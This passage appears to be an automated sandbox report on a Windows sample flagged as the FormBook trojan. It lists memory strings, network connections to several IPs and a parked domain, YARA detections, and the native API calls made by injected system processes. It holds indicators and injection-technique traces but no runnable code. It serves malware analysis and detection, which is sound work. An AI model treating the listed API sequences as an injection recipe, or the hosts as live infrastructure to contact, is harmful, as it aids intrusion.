              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1283864027.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.cpamerix.online&utm_medium=parking&utm_campaign=s_land_
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.cpamerix.online&utm_medium=parking&utm_campaign=s_land
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.cpamerix.online&utm_medium=parking&utm_campaign=s_land_ho
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.cpamerix.online&amp;reg_source=parking_auto
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.3.65:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.3.65:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.231.236.129:443 -> 192.168.2.7:49713 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AAB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,0_2_02AAB118
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA7A2C NtAllocateVirtualMemory,0_2_02AA7A2C
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA7D78 NtWriteVirtualMemory,0_2_02AA7D78
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02AADD70
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA7A2A NtAllocateVirtualMemory,0_2_02AA7A2A
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AADBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02AADBB0
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AADC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02AADC8C
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AADC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02AADC04
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA8D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_02AA8D6E
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA8D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02AA8D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0661C3C3 NtClose,10_2_0661C3C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065FA775 NtMapViewOfSection,10_2_065FA775
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762B60 NtClose,LdrInitializeThunk,10_2_22762B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_22762C70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_22762DF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227635C0 NtCreateMutant,LdrInitializeThunk,10_2_227635C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22764340 NtSetContextThread,10_2_22764340
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22764650 NtSuspendThread,10_2_22764650
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762AF0 NtWriteFile,10_2_22762AF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762AD0 NtReadFile,10_2_22762AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762AB0 NtWaitForSingleObject,10_2_22762AB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762BF0 NtAllocateVirtualMemory,10_2_22762BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762BE0 NtQueryValueKey,10_2_22762BE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762BA0 NtEnumerateValueKey,10_2_22762BA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762B80 NtQueryInformationFile,10_2_22762B80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762E30 NtWriteVirtualMemory,10_2_22762E30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762EE0 NtQueueApcThread,10_2_22762EE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762EA0 NtAdjustPrivilegesToken,10_2_22762EA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762E80 NtReadVirtualMemory,10_2_22762E80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762F60 NtCreateProcessEx,10_2_22762F60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762F30 NtCreateSection,10_2_22762F30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762FE0 NtCreateFile,10_2_22762FE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762FB0 NtResumeThread,10_2_22762FB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762FA0 NtQuerySection,10_2_22762FA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762F90 NtProtectVirtualMemory,10_2_22762F90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762C60 NtCreateKey,10_2_22762C60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762C00 NtQueryInformationProcess,10_2_22762C00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762CF0 NtOpenProcess,10_2_22762CF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762CC0 NtQueryVirtualMemory,10_2_22762CC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762CA0 NtQueryInformationToken,10_2_22762CA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762D30 NtUnmapViewOfSection,10_2_22762D30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762D10 NtMapViewOfSection,10_2_22762D10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762D00 NtSetInformationFile,10_2_22762D00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762DD0 NtDelayExecution,10_2_22762DD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762DB0 NtEnumerateKey,10_2_22762DB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22763010 NtOpenDirectoryObject,10_2_22763010
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22763090 NtSetValueKey,10_2_22763090
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227639B0 NtGetContextThread,10_2_227639B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22763D70 NtOpenThread,10_2_22763D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22763D10 NtOpenProcessToken,10_2_22763D10
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03094340 NtSetContextThread,LdrInitializeThunk,13_2_03094340
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03094650 NtSuspendThread,LdrInitializeThunk,13_2_03094650
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092B60 NtClose,LdrInitializeThunk,13_2_03092B60
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_03092BA0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092BE0 NtQueryValueKey,LdrInitializeThunk,13_2_03092BE0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_03092BF0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092AD0 NtReadFile,LdrInitializeThunk,13_2_03092AD0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092AF0 NtWriteFile,LdrInitializeThunk,13_2_03092AF0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092F30 NtCreateSection,LdrInitializeThunk,13_2_03092F30
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092FB0 NtResumeThread,LdrInitializeThunk,13_2_03092FB0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092FE0 NtCreateFile,LdrInitializeThunk,13_2_03092FE0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_03092E80
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092EE0 NtQueueApcThread,LdrInitializeThunk,13_2_03092EE0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092D10 NtMapViewOfSection,LdrInitializeThunk,13_2_03092D10
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_03092D30
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092DD0 NtDelayExecution,LdrInitializeThunk,13_2_03092DD0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_03092DF0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092C60 NtCreateKey,LdrInitializeThunk,13_2_03092C60
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_03092C70
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_03092CA0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030935C0 NtCreateMutant,LdrInitializeThunk,13_2_030935C0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030939B0 NtGetContextThread,LdrInitializeThunk,13_2_030939B0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092B80 NtQueryInformationFile,13_2_03092B80
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092AB0 NtWaitForSingleObject,13_2_03092AB0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092F60 NtCreateProcessEx,13_2_03092F60
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092F90 NtProtectVirtualMemory,13_2_03092F90
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092FA0 NtQuerySection,13_2_03092FA0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092E30 NtWriteVirtualMemory,13_2_03092E30
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092EA0 NtAdjustPrivilegesToken,13_2_03092EA0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092D00 NtSetInformationFile,13_2_03092D00
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092DB0 NtEnumerateKey,13_2_03092DB0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092C00 NtQueryInformationProcess,13_2_03092C00
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092CC0 NtQueryVirtualMemory,13_2_03092CC0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03092CF0 NtOpenProcess,13_2_03092CF0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03093010 NtOpenDirectoryObject,13_2_03093010
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03093090 NtSetValueKey,13_2_03093090
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03093D10 NtOpenProcessToken,13_2_03093D10
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03093D70 NtOpenThread,13_2_03093D70
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00699120 NtCreateFile,13_2_00699120
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00699290 NtReadFile,13_2_00699290
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00699390 NtDeleteFile,13_2_00699390
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00699440 NtClose,13_2_00699440
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_006995A0 NtAllocateVirtualMemory,13_2_006995A0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CEF9CF NtUnmapViewOfSection,13_2_00CEF9CF
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AB8128 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02AB8128
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A920C40_2_02A920C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0660835310_2_06608353
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065FFE0310_2_065FFE03
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065FDE8310_2_065FDE83
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065F24D010_2_065F24D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0660652F10_2_0660652F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0660653310_2_06606533
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065F2D0010_2_065F2D00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065FFBDB10_2_065FFBDB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065FFBE310_2_065FFBE3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065F11D010_2_065F11D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065F11CD10_2_065F11CD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0661E9C310_2_0661E9C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_065F21A010_2_065F21A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D027410_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B02C010_2_227B02C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EA35210_2_227EA352
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273E3F010_2_2273E3F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F03E610_2_227F03E6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C200010_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B815810_2_227B8158
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CA11810_2_227CA118
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272010010_2_22720100
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E81CC10_2_227E81CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F01AA10_2_227F01AA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E41A210_2_227E41A2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274C6E010_2_2274C6E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273077010_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275475010_2_22754750
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272C7C010_2_2272C7C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E244610_2_227E2446
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D442010_2_227D4420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DE4F610_2_227DE4F6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273053510_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F059110_2_227F0591
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA8010_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EAB4010_2_227EAB40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E6BD710_2_227E6BD7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273A84010_2_2273A840
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273284010_2_22732840
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E8F010_2_2275E8F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227168B810_2_227168B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274696210_2_22746962
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227329A010_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227FA9A610_2_227FA9A6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730E5910_2_22730E59
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EEE2610_2_227EEE26
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EEEDB10_2_227EEEDB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742E9010_2_22742E90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227ECE9310_2_227ECE93
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A4F4010_2_227A4F40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22750F3010_2_22750F30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D2F3010_2_227D2F30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22772F2810_2_22772F28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273CFE010_2_2273CFE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22722FC810_2_22722FC8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AEFA010_2_227AEFA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730C0010_2_22730C00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720CF210_2_22720CF2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D0CB510_2_227D0CB5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CCD1F10_2_227CCD1F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273AD0010_2_2273AD00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272ADE010_2_2272ADE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22748DBF10_2_22748DBF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D12ED10_2_227D12ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274B2C010_2_2274B2C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227352A010_2_227352A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271D34C10_2_2271D34C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E132D10_2_227E132D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2277739A10_2_2277739A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E70E910_2_227E70E9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EF0E010_2_227EF0E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DF0CC10_2_227DF0CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227370C010_2_227370C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271F17210_2_2271F172
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227FB16B10_2_227FB16B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2276516C10_2_2276516C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273B1B010_2_2273B1B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2277563010_2_22775630
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E16CC10_2_227E16CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EF7B010_2_227EF7B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272146010_2_22721460
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EF43F10_2_227EF43F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E757110_2_227E7571
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F95C310_2_227F95C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CD5B010_2_227CD5B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A3A6C10_2_227A3A6C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFA4910_2_227EFA49
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E7A4610_2_227E7A46
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DDAC610_2_227DDAC6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CDAAC10_2_227CDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22775AA010_2_22775AA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D1AA310_2_227D1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFB7610_2_227EFB76
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A5BF010_2_227A5BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2276DBF910_2_2276DBF9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274FB8010_2_2274FB80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279D80010_2_2279D800
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227338E010_2_227338E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2273995010_2_22739950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274B95010_2_2274B950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C591010_2_227C5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22739EB010_2_22739EB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFF0910_2_227EFF09
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_226F3FD510_2_226F3FD5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_226F3FD210_2_226F3FD2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFFB110_2_227EFFB1
